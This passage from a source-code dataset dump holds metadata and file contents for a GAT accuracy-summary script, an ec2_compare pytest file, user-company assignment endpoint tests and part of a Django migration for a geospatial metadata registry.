| 33.770883 | 88 | 0.620212 | 1,783 | 14,150 | 4.770611 | 0.089176 | 0.108629 | 0.10087 | 0.116388 | 0.83976 | 0.82095 | 0.79826 | 0.787797 | 0.78039 | 0.78039 | 0 | 0.044948 | 0.295618 | 14,150 | 418 | 89 | 33.851675 | 0.808468 | 0.043675 | 0 | 0.687845 | 1 | 0 | 0.177572 | 0.001628 | 0 | 0 | 0 | 0 | 0 | 1 | 0.016575 | false | 0 | 0.016575 | 0 | 0.361878 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b688d65b3d976cbd2a4488433ae534b9fb776476 | 8,228 | py | Python | testhscora.py | discovershu/GAT_uncertainty_and_cotrain | 9a8906d7111427e39a25a8fe929480091555e3ff | [
"MIT"
] | 1 | 2019-05-09T04:24:52.000Z | 2019-05-09T04:24:52.000Z | testhscora.py | discovershu/GAT_uncertainty_and_cotrain | 9a8906d7111427e39a25a8fe929480091555e3ff | [
"MIT"
] | null | null | null | testhscora.py | discovershu/GAT_uncertainty_and_cotrain | 9a8906d7111427e39a25a8fe929480091555e3ff | [
"MIT"
] | null | null | null | import numpy as np
# 50 parameter, 500 bayes
gat_ori = [0.8209999203681946, 0.8230000138282776, 0.8260000348091125, 0.8280000686645508, 0.8399999737739563, 0.8319999575614929, 0.8349998593330383, 0.8339999914169312, 0.8159999251365662, 0.8329999446868896]
#200
gat_teacher_cotrain = [0.834999144077301, 0.8419991731643677, 0.8189991116523743, 0.8319991827011108,0.8129991292953491, 0.8239991068840027 ,0.8219991326332092, 0.8259991407394409, 0.8029990792274475]
gat_teacher_Baye_cotrain = [0.83800, 0.84100, 0.81200, 0.83200,0.81900, 0.82400,0.82300, 0.83300, 0.80000]
#50
gat_teacher_cotrain2 = [0.8249991536140442, 0.8299991488456726, 0.834999144077301, 0.8329991698265076, 0.8319991827011108, 0.8309991359710693, 0.8469991683959961, 0.8189991116523743,0.7889990210533142, 0.837999165058136]
gat_teacher_Baye_cotrain2 = [0.82000, 0.83000, 0.83700, 0.82800, 0.83500, 0.83600, 0.84500, 0.82300,0.79600, 0.83400]
gat_teacher_cotrain2 = [0.8299991488456726, 0.834999144077301, 0.8329991698265076, 0.8319991827011108, 0.8309991359710693, 0.8469991683959961, 0.837999165058136]
gat_teacher_Baye_cotrain2 = [0.83000, 0.83700, 0.82800, 0.83500, 0.83600, 0.84500, 0.83400]
#no trad
gat_teacher_cotrain3 = [0.8419991731643677, 0.837999165058136, 0.8309991359710693, 0.8359991908073425, 0.8359991908073425, 0.8279991149902344, 0.8329991698265076, 0.8319991827011108, 0.8179991245269775, 0.8149991035461426, 0.8369991779327393]
gat_teacher_Baye_cotrain3 = [0.84100, 0.83100, 0.83600, 0.83300, 0.83400, 0.82800, 0.84400, 0.83600, 0.81600, 0.80700, 0.83000]
gat_teacher_cotrain3 = [0.8419991731643677, 0.837999165058136, 0.8309991359710693, 0.8359991908073425, 0.8359991908073425, 0.8329991698265076, 0.8319991827011108, 0.8369991779327393]
gat_teacher_Baye_cotrain3 = [0.84100, 0.83100, 0.83600, 0.83300, 0.83400, 0.84400, 0.83600, 0.83000]
# 50 parameter, 100 bayes, dropout 0.6, 0.4
gat_teacher_100_64 = [0.8399991989135742, 0.8439992070198059, 0.8059991002082825, 0.8309991359710693, 0.837999165058136, 0.837999165058136, 0.8309991359710693, 0.837999165058136, 0.8019990921020508, 0.8219991326332092]
gat_Baye_teacher_100_64 = [0.84300, 0.84800, 0.80400, 0.83900, 0.83200, 0.83700, 0.83400, 0.83500, 0.80500, 0.82300]
gat_teacher_100_64 = [0.8399991989135742, 0.8439992070198059, 0.8309991359710693, 0.837999165058136, 0.837999165058136, 0.8309991359710693, 0.837999165058136, 0.8219991326332092]
gat_Baye_teacher_100_64 = [0.84300, 0.84800, 0.83900, 0.83200, 0.83700, 0.83400, 0.83500, 0.82300]
gat_teacher_100_64_1 = [0.8339991569519043, 0.8389991521835327, 0.837999165058136, 0.819999098777771, 0.8369991779327393, 0.8369991779327393, 0.8369991779327393, 0.8179991245269775, 0.8359991908073425, 0.8369991779327393]
gat_Baye_teacher_100_64_1 = [0.82700, 0.83900, 0.84400, 0.81700, 0.83300, 0.83700, 0.84200, 0.81400, 0.83300, 0.83700]
gat_teacher_100_64_1 = [0.8339991569519043, 0.8389991521835327, 0.837999165058136, 0.8369991779327393, 0.8369991779327393, 0.8369991779327393, 0.8359991908073425, 0.8369991779327393]
gat_Baye_teacher_100_64_1 = [0.82700, 0.83900, 0.84400, 0.83300, 0.83700, 0.84200, 0.83300, 0.83700]
a= [0.8399991989135742, 0.8439992070198059, 0.8309991359710693, 0.837999165058136, 0.837999165058136, 0.8309991359710693, 0.837999165058136, 0.8219991326332092, 0.8339991569519043, 0.8389991521835327, 0.837999165058136, 0.8369991779327393, 0.8369991779327393, 0.8369991779327393, 0.8359991908073425, 0.8369991779327393]
b= [0.84300, 0.84800, 0.83900, 0.83200, 0.83700, 0.83400, 0.83500, 0.82300, 0.82700, 0.83900, 0.84400, 0.83300, 0.83700, 0.84200, 0.83300, 0.83700]
# 50 parameter, 500 bayes, dropout 0.6, 0.4 (great)
gat_teacher_500_64 = [0.8339991569519043, 0.8449991941452026, 0.8319991827011108, 0.840999186038971, 0.8369991779327393, 0.8339991569519043, 0.8489992022514343, 0.8269991278648376, 0.8219991326332092, 0.8399991989135742]
gat_Baye_teacher_500_64 = [0.83200, 0.84500, 0.83200, 0.84200, 0.83500, 0.83400, 0.84400, 0.82800, 0.81900,0.84000]
gat_teacher_500_64 = [0.8339991569519043, 0.8449991941452026, 0.8319991827011108, 0.840999186038971, 0.8369991779327393, 0.8339991569519043, 0.8489992022514343, 0.8269991278648376, 0.8399991989135742]
gat_Baye_teacher_500_64 = [0.83200, 0.84500, 0.83200, 0.84200, 0.83500, 0.83400, 0.84400, 0.82800, 0.84000]
# 50 parameter, 100 bayes, dropout 0.6, 0.4 cotrain (great)
gat_cotrain_teacher_100_64 = [0.8299991488456726, 0.8479992151260376, 0.8299991488456726, 0.840999186038971, 0.8269991278648376, 0.8269991278648376, 0.8399991989135742, 0.8329991698265076, 0.8329991698265076]
gat_cotrain_Baye_teacher_100_64 = [0.83300, 0.84700, 0.83300, 0.83600, 0.82700, 0.82100, 0.83800, 0.83000, 0.82900]
gat_cotrain_teacher_100_64 = [0.8299991488456726, 0.8479992151260376, 0.8299991488456726, 0.840999186038971, 0.8269991278648376, 0.8399991989135742, 0.8329991698265076, 0.8329991698265076]
gat_cotrain_Baye_teacher_100_64 = [0.83300, 0.84700, 0.83300, 0.83600, 0.82700, 0.83800, 0.83000, 0.82900]
# 50 parameter, 500 bayes, dropout 0.6, 0.4 cotrain
gat_cotrain_teacher_500_64 = [0.8309991359710693, 0.8099991083145142, 0.834999144077301, 0.834999144077301, 0.8219991326332092, 0.8399991989135742, 0.8359991908073425, 0.8299991488456726]
gat_cotrain_Baye_teacher_500_64 = [0.83200, 0.80900, 0.83300, 0.8310, 0.82700, 0.84200, 0.83100, 0.83100]
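The reporting pattern used below can be sketched on a tiny hypothetical accuracy list; note that `np.std` defaults to the population standard deviation (ddof=0):

```python
import numpy as np

# Tiny hypothetical accuracy list, formatted like the reports below
accs = [0.83, 0.84, 0.85]
line = "Random accuracy= {:.5f} Random std= {:.5f}".format(np.mean(accs), np.std(accs))
assert line.startswith("Random accuracy= 0.84000")
```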
print("#######################################")
print("Random accuracy=", "{:.5f}".format(np.mean(gat_teacher_100_64)), "Random std=", "{:.5f}".format(np.std(gat_teacher_100_64)))
print("Random accuracy=", "{:.5f}".format(np.mean(gat_Baye_teacher_100_64)), "Random std=", "{:.5f}".format(np.std(gat_Baye_teacher_100_64)))
print("#######################################")
print("Random accuracy=", "{:.5f}".format(np.mean(gat_teacher_100_64_1)), "Random std=", "{:.5f}".format(np.std(gat_teacher_100_64_1)))
print("Random accuracy=", "{:.5f}".format(np.mean(gat_Baye_teacher_100_64_1)), "Random std=", "{:.5f}".format(np.std(gat_Baye_teacher_100_64_1)))
print("#######################################")
print("Random accuracy=", "{:.5f}".format(np.mean(a)), "Random std=", "{:.5f}".format(np.std(a)))
print("Random accuracy=", "{:.5f}".format(np.mean(b)), "Random std=", "{:.5f}".format(np.std(b)))
print("#######################################")
print("Random accuracy=", "{:.5f}".format(np.mean(gat_teacher_500_64)), "Random std=", "{:.5f}".format(np.std(gat_teacher_500_64)))
print("Random accuracy=", "{:.5f}".format(np.mean(gat_Baye_teacher_500_64)), "Random std=", "{:.5f}".format(np.std(gat_Baye_teacher_500_64)))
print("#######################################")
print("Random accuracy=", "{:.5f}".format(np.mean(gat_cotrain_teacher_100_64)), "Random std=", "{:.5f}".format(np.std(gat_cotrain_teacher_100_64)))
print("Random accuracy=", "{:.5f}".format(np.mean(gat_cotrain_Baye_teacher_100_64)), "Random std=", "{:.5f}".format(np.std(gat_cotrain_Baye_teacher_100_64)))
print("#######################################")
print("Random accuracy=", "{:.5f}".format(np.mean(gat_cotrain_teacher_500_64)), "Random std=", "{:.5f}".format(np.std(gat_cotrain_teacher_500_64)))
print("Random accuracy=", "{:.5f}".format(np.mean(gat_cotrain_Baye_teacher_500_64)), "Random std=", "{:.5f}".format(np.std(gat_cotrain_Baye_teacher_500_64)))
# print("Random accuracy=", "{:.5f}".format(np.mean(gat_ori)), "Random std=", "{:.5f}".format(np.std(gat_ori)))
# print("Random accuracy=", "{:.5f}".format(np.mean(gat_teacher_cotrain)), "Random std=", "{:.5f}".format(np.std(gat_teacher_cotrain)))
# print("Random accuracy=", "{:.5f}".format(np.mean(gat_teacher_Baye_cotrain)), "Random std=", "{:.5f}".format(np.std(gat_teacher_Baye_cotrain)))
#
# print("Random accuracy=", "{:.5f}".format(np.mean(gat_teacher_cotrain2)), "Random std=", "{:.5f}".format(np.std(gat_teacher_cotrain2)))
# print("Random accuracy=", "{:.5f}".format(np.mean(gat_teacher_Baye_cotrain2)), "Random std=", "{:.5f}".format(np.std(gat_teacher_Baye_cotrain2)))
#
# print("Random accuracy=", "{:.5f}".format(np.mean(gat_teacher_cotrain3)), "Random std=", "{:.5f}".format(np.std(gat_teacher_cotrain3)))
# print("Random accuracy=", "{:.5f}".format(np.mean(gat_teacher_Baye_cotrain3)), "Random std=", "{:.5f}".format(np.std(gat_teacher_Baye_cotrain3)))
| 95.674419 | 321 | 0.737846 | 1,171 | 8,228 | 5.002562 | 0.099915 | 0.051895 | 0.064869 | 0.068112 | 0.829635 | 0.809321 | 0.792933 | 0.751963 | 0.745476 | 0.663878 | 0 | 0.479563 | 0.066359 | 8,228 | 85 | 322 | 96.8 | 0.282999 | 0.143899 | 0 | 0.12 | 0 | 0 | 0.099929 | 0.03331 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.02 | 0 | 0.02 | 0.36 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
b6974e3a93572ac3fa7f043c74f7c4c8f2081139 | 391 | py | Python | tests/internal/current_generation/test_current_generation_true_auto.py | frolovv/aws.ec2.compare | 582805823492f833d65c0441c4a14dce697c12aa | [
"Apache-2.0"
] | null | null | null | tests/internal/current_generation/test_current_generation_true_auto.py | frolovv/aws.ec2.compare | 582805823492f833d65c0441c4a14dce697c12aa | [
"Apache-2.0"
] | null | null | null | tests/internal/current_generation/test_current_generation_true_auto.py | frolovv/aws.ec2.compare | 582805823492f833d65c0441c4a14dce697c12aa | [
"Apache-2.0"
] | 1 | 2021-12-15T11:58:22.000Z | 2021-12-15T11:58:22.000Z |
# Testing module current_generation.true
import pytest
import ec2_compare.internal.current_generation.true
def test_get_internal_data_current_generation_true_get_instances_list():
assert len(ec2_compare.internal.current_generation.true.get_instances_list()) > 0
def test_get_internal_data_current_generation_true_get():
assert len(ec2_compare.internal.current_generation.true.get) > 0
| 39.1 | 83 | 0.86445 | 56 | 391 | 5.589286 | 0.339286 | 0.325879 | 0.402556 | 0.306709 | 0.827476 | 0.827476 | 0.619808 | 0.619808 | 0.619808 | 0 | 0 | 0.013699 | 0.066496 | 391 | 9 | 84 | 43.444444 | 0.843836 | 0.097187 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 10 |
1e26edd38a97c1607a69a89f498ef826846fb970 | 2,582 | py | Python | oxe-api/test/resource/user/test_add_user_company.py | CybersecurityLuxembourg/openxeco | 8d4e5578bde6a07f5d6d569b16b4de224abf7bf0 | [
"BSD-2-Clause"
] | null | null | null | oxe-api/test/resource/user/test_add_user_company.py | CybersecurityLuxembourg/openxeco | 8d4e5578bde6a07f5d6d569b16b4de224abf7bf0 | [
"BSD-2-Clause"
] | null | null | null | oxe-api/test/resource/user/test_add_user_company.py | CybersecurityLuxembourg/openxeco | 8d4e5578bde6a07f5d6d569b16b4de224abf7bf0 | [
"BSD-2-Clause"
] | null | null | null | from test.BaseCase import BaseCase

class TestAddUserCompany(BaseCase):

    @BaseCase.login
    @BaseCase.grant_access("/user/add_user_company")
    def test_ok(self, token):
        self.db.insert({"id": 2, "email": "myemail@test.lu", "password": "MySecretSecret"}, self.db.tables["User"])
        self.db.insert({"id": 14, "name": "My company"}, self.db.tables["Company"])

        payload = {
            "user_id": 2,
            "company_id": 14,
        }

        response = self.application.post('/user/add_user_company',
                                         headers=self.get_standard_post_header(token),
                                         json=payload)

        assignments = self.db.get(self.db.tables["UserCompanyAssignment"])

        self.assertEqual(200, response.status_code)
        self.assertEqual(len(assignments), 1)

    @BaseCase.login
    @BaseCase.grant_access("/user/add_user_company")
    def test_ok_with_department(self, token):
        self.db.insert({"id": 2, "email": "myemail@test.lu", "password": "MySecretSecret"}, self.db.tables["User"])
        self.db.insert({"id": 14, "name": "My company"}, self.db.tables["Company"])

        payload = {
            "user_id": 2,
            "company_id": 14,
            "department": "OTHER",
        }

        response = self.application.post('/user/add_user_company',
                                         headers=self.get_standard_post_header(token),
                                         json=payload)

        assignments = self.db.get(self.db.tables["UserCompanyAssignment"])

        self.assertEqual(200, response.status_code)
        self.assertEqual(len(assignments), 1)

    @BaseCase.login
    @BaseCase.grant_access("/user/add_user_company")
    def test_already_exist(self, token):
        self.db.insert({"id": 2, "email": "myemail@test.lu", "password": "MySecretSecret"}, self.db.tables["User"])
        self.db.insert({"id": 14, "name": "My company"}, self.db.tables["Company"])
        self.db.insert({"user_id": 2, "company_id": 14}, self.db.tables["UserCompanyAssignment"])

        payload = {
            "user_id": 2,
            "company_id": 14,
        }

        response = self.application.post('/user/add_user_company',
                                         headers=self.get_standard_post_header(token),
                                         json=payload)

        assignments = self.db.get(self.db.tables["UserCompanyAssignment"])

        self.assertEqual("422 Object already existing", response.status)
        self.assertEqual(len(assignments), 1)
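The behaviour these tests pin down (create the user/company assignment on first POST, refuse a duplicate with "422 Object already existing") can be sketched without the framework. This is a hypothetical, in-memory illustration, not the real oxe-api handler; the names `add_user_company` and `assignments` are made up for the sketch.

```python
# Minimal in-memory sketch of the contract tested above (illustrative only).
# The real endpoint persists a UserCompanyAssignment row via the database layer.

assignments = set()  # stores (user_id, company_id) pairs


def add_user_company(user_id, company_id, department=None):
    """Return an (http_status, message) pair mimicking the endpoint."""
    if (user_id, company_id) in assignments:
        # Duplicate pair: reject without touching the stored assignments.
        return 422, "Object already existing"
    assignments.add((user_id, company_id))
    return 200, "OK"
```

A duplicate POST leaves exactly one assignment behind, which is why every test asserts `len(assignments) == 1` regardless of the status code.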
# backend/registry/migrations/0001_initial.py
# repo: mrmap-community/MrMap (MIT license)

# Generated by Django 3.2.9 on 2022-01-01 17:58
import MrMap.validators
from django.conf import settings
import django.contrib.auth.models
import django.contrib.gis.db.models.fields
from django.db import migrations, models
import django.db.models.deletion
import django.db.models.manager
import extras.models
import mptt.fields
import registry.models.document
import registry.models.harvest
import registry.models.mapcontext
import registry.models.security
import simple_history.models
import uuid


class Migration(migrations.Migration):

    initial = True

    dependencies = [
        ('auth', '0012_alter_user_first_name_max_length'),
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('contenttypes', '0002_remove_content_type_name'),
    ]

    operations = [
        migrations.CreateModel(
            name='AllowedOperation',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('allowed_area', django.contrib.gis.db.models.fields.MultiPolygonField(blank=True, null=True, srid=4326, validators=[MrMap.validators.geometry_is_empty])),
                ('description', models.CharField(help_text='a short description what this allowed operation controls.', max_length=512, verbose_name='description')),
            ],
        ),
        migrations.CreateModel(
            name='AllowedOperationGroupRelation',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
            ],
        ),
        migrations.CreateModel(
            name='AnalyzedResponseLog',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('entity_count', models.FloatField(help_text='Stores the response entity count. For WMS this will be the indiscreet number of megapixels that are returned by the service. For WFS this will be discrete number of feature types that are returned by the service.')),
                ('entity_total_count', models.FloatField(help_text='Stores the response entity total count. For WMS this will be the indiscreet number of megapixels that are returned by the service. For WFS this will be discrete number of feature types that are returned by the service.')),
                ('entity_unit', models.CharField(choices=[('MPx', 'MPx'), ('Ft', 'Ft')], help_text='The unit in which the entity count is stored.', max_length=5)),
            ],
        ),
        migrations.CreateModel(
            name='CatalougeService',
            fields=[
                ('xml_backup_file', models.FileField(editable=False, help_text='the original xml as backup to restore the xml field.', upload_to=registry.models.document.xml_backup_file_path, verbose_name='xml backup')),
                ('access_constraints', models.TextField(blank=True, help_text='access constraints for the given resource.', null=True, verbose_name='access constraints')),
                ('fees', models.TextField(blank=True, help_text='Costs and of terms of use for the given resource.', null=True, verbose_name='fees')),
                ('use_limitation', models.TextField(blank=True, null=True)),
                ('license_source_note', models.TextField(blank=True, null=True)),
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('date_stamp', models.DateTimeField(auto_now_add=True, db_index=True, help_text='date that the metadata was created. If this is a metadata record which is parsed from remote iso metadata, the date stamp of the remote iso metadata will be used.', verbose_name='date stamp')),
                ('file_identifier', models.CharField(db_index=True, default=uuid.uuid4, editable=False, help_text='the parsed file identifier from the iso metadata xml (gmd:fileIdentifier) OR for example if it is a layer/featuretypethe uuid of the described layer/featuretype shall be used to identify the generated iso metadata xml.', max_length=1000, null=True, verbose_name='file identifier')),
                ('origin', models.CharField(choices=[(None, '---'), ('capabilities', 'capabilities'), ('iso metadata', 'iso metadata')], editable=False, help_text='Where the metadata record comes from.', max_length=20, verbose_name='origin')),
                ('origin_url', models.URLField(blank=True, editable=False, help_text='the url of the document where the information of this metadata record comes from', max_length=4096, null=True, verbose_name='origin url')),
                ('title', models.CharField(help_text='a short descriptive title for this metadata', max_length=1000, verbose_name='title')),
                ('abstract', models.TextField(help_text='brief summary of the content of this metadata.', null=True, verbose_name='abstract')),
                ('is_broken', models.BooleanField(default=False, editable=False, help_text='TODO', verbose_name='is broken')),
                ('is_customized', models.BooleanField(default=False, editable=False, help_text='If the metadata record is customized, this flag is True', verbose_name='is customized')),
                ('insufficient_quality', models.TextField(blank=True, help_text='TODO', null=True)),
                ('is_searchable', models.BooleanField(default=False, help_text='only searchable metadata will be returned from the search api', verbose_name='is searchable')),
                ('hits', models.IntegerField(default=0, editable=False, help_text='how many times this metadata was requested by a client', verbose_name='hits')),
                ('is_active', models.BooleanField(default=False, help_text='Used to activate/deactivate the service. If it is deactivated, you cant request the service through the Mr. Map proxy.', verbose_name='is active?')),
                ('version', models.CharField(choices=[(None, '---'), ('1.0.0', '1.0.0'), ('1.1.0', '1.1.0'), ('1.1.1', '1.1.1'), ('1.3.0', '1.3.0'), ('2.0.0', '2.0.0'), ('2.0.2', '2.0.2')], editable=False, help_text='the version of the service type as sem version', max_length=10, verbose_name='version')),
                ('service_url', models.URLField(editable=False, help_text='the base url of the service', max_length=4096, verbose_name='url')),
                ('get_capabilities_url', models.URLField(help_text='the capabilities url of the ogc service', max_length=4096, validators=[MrMap.validators.validate_get_capablities_uri], verbose_name='get capabilities url')),
            ],
            options={
                'verbose_name': 'catalouge service',
                'verbose_name_plural': 'catalouge services',
            },
            bases=(extras.models.HistoricalRecordMixin, models.Model),
            managers=[
                ('capabilities', django.db.models.manager.Manager()),
            ],
        ),
        migrations.CreateModel(
            name='CatalougeServiceAuthentication',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('username', models.CharField(help_text='the username used for the authentication.', max_length=255, verbose_name='username')),
                ('password', models.CharField(help_text='the password used for the authentication.', max_length=500, verbose_name='password')),
                ('auth_type', models.CharField(choices=[(None, '---'), ('http_basic', 'http_basic'), ('http_digest', 'http_digest')], help_text='kind of authentication mechanism shall used.', max_length=100, verbose_name='authentication type')),
                ('key_file', models.FileField(editable=False, max_length=1024, upload_to=registry.models.security.key_file_path)),
            ],
            options={
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='CatalougeServiceOperationUrl',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('method', models.CharField(choices=[(None, '---'), ('Get', 'Get'), ('Post', 'Post')], help_text='the http method you can perform for this url', max_length=10, verbose_name='http method')),
                ('url', models.URLField(editable=False, help_text='the url for this operation', max_length=4096, verbose_name='url')),
                ('operation', models.CharField(choices=[(None, '---'), ('GetCapabilities', 'GetCapabilities'), ('GetMap', 'GetMap'), ('GetFeatureInfo', 'GetFeatureInfo'), ('DescribeLayer', 'DescribeLayer'), ('GetLegendGraphic', 'GetLegendGraphic'), ('GetStyles', 'GetStyles'), ('PutStyles', 'PutStyles'), ('GetFeature', 'GetFeature'), ('Transaction', 'Transaction'), ('LockFeature', 'LockFeature'), ('DescribeFeatureType', 'DescribeFeatureType'), ('GetFeatureWithLock', 'GetFeatureWithLock'), ('GetGmlObject', 'GetGmlObject'), ('ListStoredQueries', 'ListStoredQueries'), ('GetPropertyValue', 'GetPropertyValue'), ('DescribeStoredQueries', 'DescribeStoredQueries'), ('GetRecords', 'GetRecords'), ('DescribeRecord', 'DescribeRecord'), ('GetRecordById', 'GetRecordById')], editable=False, help_text='the operation you can perform with this url.', max_length=30, verbose_name='operation')),
            ],
            options={
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='ConformityCheckConfiguration',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=1000)),
                ('metadata_types', models.JSONField()),
                ('conformity_type', models.TextField(choices=[('internal', 'internal'), ('etf', 'etf')])),
            ],
        ),
        migrations.CreateModel(
            name='DatasetMetadata',
            fields=[
                ('xml_backup_file', models.FileField(editable=False, help_text='the original xml as backup to restore the xml field.', upload_to=registry.models.document.xml_backup_file_path, verbose_name='xml backup')),
                ('access_constraints', models.TextField(blank=True, help_text='access constraints for the given resource.', null=True, verbose_name='access constraints')),
                ('fees', models.TextField(blank=True, help_text='Costs and of terms of use for the given resource.', null=True, verbose_name='fees')),
                ('use_limitation', models.TextField(blank=True, null=True)),
                ('license_source_note', models.TextField(blank=True, null=True)),
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('date_stamp', models.DateTimeField(auto_now_add=True, db_index=True, help_text='date that the metadata was created. If this is a metadata record which is parsed from remote iso metadata, the date stamp of the remote iso metadata will be used.', verbose_name='date stamp')),
                ('file_identifier', models.CharField(db_index=True, default=uuid.uuid4, editable=False, help_text='the parsed file identifier from the iso metadata xml (gmd:fileIdentifier) OR for example if it is a layer/featuretypethe uuid of the described layer/featuretype shall be used to identify the generated iso metadata xml.', max_length=1000, null=True, verbose_name='file identifier')),
                ('origin', models.CharField(choices=[(None, '---'), ('capabilities', 'capabilities'), ('iso metadata', 'iso metadata')], editable=False, help_text='Where the metadata record comes from.', max_length=20, verbose_name='origin')),
                ('origin_url', models.URLField(blank=True, editable=False, help_text='the url of the document where the information of this metadata record comes from', max_length=4096, null=True, verbose_name='origin url')),
                ('title', models.CharField(help_text='a short descriptive title for this metadata', max_length=1000, verbose_name='title')),
                ('abstract', models.TextField(help_text='brief summary of the content of this metadata.', null=True, verbose_name='abstract')),
                ('is_broken', models.BooleanField(default=False, editable=False, help_text='TODO', verbose_name='is broken')),
                ('is_customized', models.BooleanField(default=False, editable=False, help_text='If the metadata record is customized, this flag is True', verbose_name='is customized')),
                ('insufficient_quality', models.TextField(blank=True, help_text='TODO', null=True)),
                ('is_searchable', models.BooleanField(default=False, help_text='only searchable metadata will be returned from the search api', verbose_name='is searchable')),
                ('hits', models.IntegerField(default=0, editable=False, help_text='how many times this metadata was requested by a client', verbose_name='hits')),
                ('spatial_res_type', models.CharField(choices=[('groundDistance', 'groundDistance'), ('scaleDenominator', 'scaleDenominator')], help_text='Ground resolution in meter or the equivalent scale.', max_length=20, null=True, verbose_name='resolution type')),
                ('spatial_res_value', models.FloatField(blank=True, help_text='The value depending on the selected resolution type.', null=True, verbose_name='resolution value')),
                ('format', models.CharField(blank=True, choices=[(None, '---'), ('Database', 'Database'), ('Esri shape', 'Esri shape'), ('CSV', 'CSV'), ('GML', 'GML'), ('GeoTIFF', 'GeoTIFF')], help_text='The format in which the described dataset is stored.', max_length=20, null=True, verbose_name='format')),
                ('charset', models.CharField(blank=True, choices=[(None, '---'), ('utf8', 'utf8')], help_text='The charset which is used by the stored data.', max_length=10, null=True, verbose_name='charset')),
                ('inspire_top_consistence', models.BooleanField(default=False, help_text='Flag to signal if the described data has a topologically consistence.')),
                ('preview_image', models.ImageField(blank=True, null=True, upload_to='')),
                ('lineage_statement', models.TextField(blank=True, null=True)),
                ('update_frequency_code', models.CharField(blank=True, choices=[('annually', 'annually'), ('asNeeded', 'asNeeded'), ('biannually', 'biannually'), ('irregular', 'irregular'), ('notPlanned', 'notPlanned'), ('unknown', 'unknown')], max_length=20, null=True)),
                ('bounding_geometry', django.contrib.gis.db.models.fields.MultiPolygonField(blank=True, null=True, srid=4326)),
                ('dataset_id', models.CharField(help_text='identifier of the remote data', max_length=4096, null=True)),
                ('dataset_id_code_space', models.CharField(blank=True, default='', help_text='code space for the given identifier', max_length=4096)),
                ('inspire_interoperability', models.BooleanField(default=False, help_text='flag to signal if this ')),
            ],
            options={
                'verbose_name': 'dataset metadata',
                'verbose_name_plural': 'dataset metadata',
            },
        ),
        migrations.CreateModel(
            name='DatasetMetadataConformityCheckRun',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('passed', models.BooleanField(blank=True, null=True)),
                ('report', models.TextField(blank=True, null=True)),
                ('report_type', models.TextField(choices=[('text/html', 'text/html'), ('application/json', 'application/json')])),
            ],
            options={
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='DatasetMetadataRelation',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('relation_type', models.CharField(choices=[(None, '---'), ('visualizes', 'visualizes'), ('describes', 'describes'), ('harvestedThrough', 'harvestedThrough'), ('harvestedParent', 'harvestedParent'), ('publishedBy', 'publishedBy')], max_length=20)),
                ('is_internal', models.BooleanField(default=False, help_text='true means that this relation is created by a user and the dataset is maybe not linked in a capabilities document for example.', verbose_name='internal relation?')),
                ('origin', models.CharField(choices=[(None, '---'), ('Capabilities', 'Capabilities'), ('Upload', 'Upload'), ('Editor', 'Editor'), ('Catalogue', 'Catalogue')], help_text='determines where this relation was found or it is added by a user.', max_length=20, verbose_name='origin')),
            ],
        ),
        migrations.CreateModel(
            name='Dimension',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(help_text='the type of the content stored in extent field.', max_length=50, verbose_name='name')),
                ('units', models.CharField(help_text='measurement units specifier', max_length=50, verbose_name='units')),
                ('parsed_extent', models.TextField(help_text='The extent string declares what value(s) along the Dimension axis are appropriate for this specific geospatial data object.', verbose_name='extent')),
            ],
        ),
        migrations.CreateModel(
            name='FeatureType',
            fields=[
                ('xml_backup_file', models.FileField(editable=False, help_text='the original xml as backup to restore the xml field.', upload_to=registry.models.document.xml_backup_file_path, verbose_name='xml backup')),
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('date_stamp', models.DateTimeField(auto_now_add=True, db_index=True, help_text='date that the metadata was created. If this is a metadata record which is parsed from remote iso metadata, the date stamp of the remote iso metadata will be used.', verbose_name='date stamp')),
                ('file_identifier', models.CharField(db_index=True, default=uuid.uuid4, editable=False, help_text='the parsed file identifier from the iso metadata xml (gmd:fileIdentifier) OR for example if it is a layer/featuretypethe uuid of the described layer/featuretype shall be used to identify the generated iso metadata xml.', max_length=1000, null=True, verbose_name='file identifier')),
